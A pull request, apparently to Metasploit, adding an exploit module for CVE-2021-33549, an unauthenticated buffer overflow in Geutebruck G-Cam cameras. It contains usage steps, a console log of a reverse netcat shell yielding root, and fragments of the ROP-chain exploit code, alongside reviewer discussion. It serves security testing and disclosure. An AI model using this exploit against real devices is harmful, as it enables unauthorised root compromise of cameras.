### PR TITLE
Add CVE-2021-33549 exploit for Geutebruck G-CAM

### PR DESCRIPTION
**Pull request by D14bloo**
This exploit a buffer overflow (CVE-2021-33549) in the web interface of the Geutebruck G-Cam and G-Code products.
Many brands use the same firmware:
  * UDP Technology (which is also the supplier of the firmware for the other vendors)
  * Ganz
  * Visualint
  * Cap
  * THRIVE Intelligence
  * Sophus
  * VCA
  * TripCorps
  * Sprinx Technologies
  * Smartec
  * Riva
 
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 and the blogpost about the issue : https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/geutebruck_instantrec_bof`
- [ ] `set lhost <metasploit_ip>`
- [ ] `set rhosts <camera_ip>`
- [ ] `check` to be sure the target is vulnerable
- [ ] `exploit`
- [ ] You should get a shell

### Exploitation 
```
msf6 > use exploit/linux/http/geutebruck_instantrec_bof
[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf6 exploit(linux/http/geutebruck_instantrec_bof) > set lhost 192.168.14.1
lhost => 192.168.14.1
msf6 exploit(linux/http/geutebruck_instantrec_bof) > set rhosts 192.168.14.58
rhosts => 192.168.14.58
msf6 exploit(linux/http/geutebruck_instantrec_bof) > exploit

[*] Started reverse TCP handler on 192.168.14.1:4444
[*] 192.168.14.58:80 - Attempting to exploit...
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2021-02-23 13:37:28 +0200
pwd

/tmp/www_ramdisk/uapi-cgi/admin
id
uid=0(root) gid=0(root)
uname -a
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-g3532e87a #1 PREEMPT Tue May 12 18:00:46 KST 2020 armv5tejl GNU/Linux
```

### CODE REVIEW

File: modules/exploits/linux/http/geutebruck_instantrec_bof.rb [hunk 1]
```diff
@@ -0,0 +1,140 @@
...
+    $exit_ = $libc_add + $exit_off
+    $sleep_ = $libc_add + $sleep_off
+    $putchar = $libc_add + $putchar_off
+
+    $str_r1 = $libc_add + $str_r1_off
+    $pop_r0 = $libc_add + $pop_r0_off
+    $pop_r1 = $libc_add + $pop_r1_off
+    $pop_r4 = $libc_add + $pop_r4_off
+
+    $add_str = $libc_data_off + $libc_add + 4
```
Comment (bwatters-r7) [inline modules/exploits/linux/http/geutebruck_instantrec_bof.rb:91]: https://github.com/rapid7/metasploit-framework/pull/15488#discussion_r677928627

Comment (red0xff) [reply modules/exploits/linux/http/geutebruck_instantrec_bof.rb]: [My suggested change on the same PR](https://github.com/rapid7/metasploit-framework/pull/15488#discussion_r696747223) might come in handy, it removes unused variables, redesigns the module, and gets rid of global variables.

Comment (TrGFxX) [reply modules/exploits/linux/http/geutebruck_instantrec_bof.rb]: > [My suggested change on the same PR](https://github.com/rapid7/metasploit-framework/pull/15488#discussion_r696747223) might come in handy, it removes unused variables, redesigns the module, and gets rid of global variables.

Hello @red0xff, yes i take your changes in consideration when i made the new PR, thanks!

File: modules/exploits/linux/http/geutebruck_instantrec_bof.rb [hunk 2]
```diff
@@ -0,0 +1,109 @@
...
+    rop += [pop_r0]
+    rop += [add_str]
+    rop += [system_]
+    rop.pack('V*')
+  end
+
+  def exploit
+    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+    pad_size = 536
+    data = 'a' * pad_size + write_payload
```
Comment (bwatters-r7) [inline modules/exploits/linux/http/geutebruck_instantrec_bof.rb:99]: Have you considered using the `rand_text_alphanumeric` method?

**Comment by bwatters-r7** [comment]
Also, I saw the previous PCAP, but an updated one after the shift to the new PR when the code is done would be useful.

File: modules/exploits/linux/http/geutebruck_instantrec_bof.rb (hunk 2 above)
Comment (space-r7) [reply modules/exploits/linux/http/geutebruck_instantrec_bof.rb:99]: `Rex::Text.pattern_create()` is also a good option here.

**Comment by space-r7** [comment]
Hi @TrGFxX, since this module had a few updates, please send us a PCAP when you get the chance. Thank you!

**Comment by TrGFxX** [comment]
> Hi @TrGFxX, since this module had a few updates, please send us a PCAP when you get the chance. Thank you!

Hello, yes sure! @ddouhine just sent that.

**Comment by TrGFxX** [comment]
Hi @gwillcox-r7, any update on this ?

**Comment by gwillcox-r7** [comment]
> Hi @gwillcox-r7, any update on this ?

Heyo @TrGFxX so I'm on research rotation this week and next so I won't be available to work on this PR until the 27th of September. In the meantime please feel free to reach out to @space-r7 this week or @jheysel-r7 starting next week and they will be happy to assist you since they are both on PR duty.

**Comment by space-r7** [comment]
> Hi @gwillcox-r7, any update on this ?

Hi @TrGFxX, Grant is currently on research, but I'm happy to land this. I have a couple of PRs I'm currently working on, but I can get to this one once I'm done with those. There is a review comment mentioning using either `Rex::Text.rand_text_alphanumeric()` or `Rex::Text.pattern_create()` for the `data` variable, but aside from that, I have no further suggestions code-wise. Also wanted to confirm that we received the PCAPs, so thank you!

**Comment by TrGFxX** [comment]
> > Hi @gwillcox-r7, any update on this ?
> 
> Hi @TrGFxX, Grant is currently on research, but I'm happy to land this. I have a couple of PRs I'm currently working on, but I can get to this one once I'm done with those. There is a review comment mentioning using either `Rex::Text.rand_text_alphanumeric()` or `Rex::Text.pattern_create()` for the `data` variable, but aside from that, I have no further suggestions code-wise. Also wanted to confirm that we received the PCAPs, so thank you!

hello @space-r7, we just added that. Thank you!

**Comment by space-r7** [comment]
Verified PCAP, thanks!

**Comment by space-r7** [comment]
## Release Notes

This module exploits an unauthenticated buffer overflow vulnerability within the `action` parameter of the `/uapi-cgi/instantrec.cgi` endpoint in various Geutebruck G-Cam and G-Code devices. The exploit results in code execution as the `root` user on target devices.

**Pull request merged**